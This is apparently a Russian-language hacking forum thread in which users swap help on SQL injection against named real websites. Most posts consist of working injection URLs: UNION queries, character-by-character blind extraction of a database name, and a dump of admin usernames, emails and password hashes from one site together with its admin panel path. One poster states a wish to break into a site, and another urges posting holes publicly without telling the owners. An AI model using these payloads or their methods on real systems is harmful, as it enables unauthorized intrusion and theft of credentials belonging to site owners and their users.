и в том дело я незнаю как у него обстоят дела, для этого я привел пример под root-ом а для того чтобы он узнал user-a привел пример как это узнать насчет user-а можешь проверить запросом http://test/news/php?id=1+union+select+1,user(),2,3--
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру. Может кому-нибудь тут пригодится.
Не могу вывести database(). HTML: http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=2 and substring(version(),1,1)=5
2 FlaktW Code: http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1) http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1) db197513_ и так далее..
Подобрал ордером число колоно - 4 Выводу юнионом, возникает ошибка Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
Ну я примерно так и понял Делать-то что?( И еще, в другой скуле при юнионе пишет: Invalid query: Unknown column 'createTime' in 'field list' Как крутить?(
Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
Очень хочется взломать этот сайт! Что можете предложить? http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id, md5_id, full_name, user_name, user_email, user_level, pwd, address, country, tel, fax, website, date, users_ip, approved, activation_code, banned, ckey, ctime),6,7,8+from+etrack+--+ 54::admin:admin:admin@localhost:5:4c09e75fa6fe36038ac240e9e4e0126cedef6d8c85cf0a1ae:admin:Switzerland:4433093999:::2010-05-04::1:0:0:uqd1y4v:1272992243 http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id, full_name, user_name, user_pwd, user_email, activation_code, joined, country, user_activated),6,7,8+from+users+--+ 6:admin::5f0210ed3fa1e3301e5fac5928cc9712:[email protected]:8971:2008-12-30:India:1 админка: www.rsgt.com/admin
Как можно обойти двойной запрос?? PHP: Query: SELECT c.name AS category, b.category AS category_ident, b.reported_against AS reported_against_ident, b.release_fixed AS release_fixed_ident, s.name AS state, b.state AS state_ident, b.submit_date AS submit_date, b.submit_time AS submit_time, b.fix_date AS fix_date, b.fix_time AS fix_time, b.synopsis AS synopsis, b.duplicate AS duplicate, o.name AS os, b.os AS os_ident, b.name AS name, b.email AS email, b.repid AS repid FROM bugs b, categories c, states s, oslist o WHERE c.ident = b.category AND s.ident = b.state AND o.ident = b.os AND b.ident = -4960 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
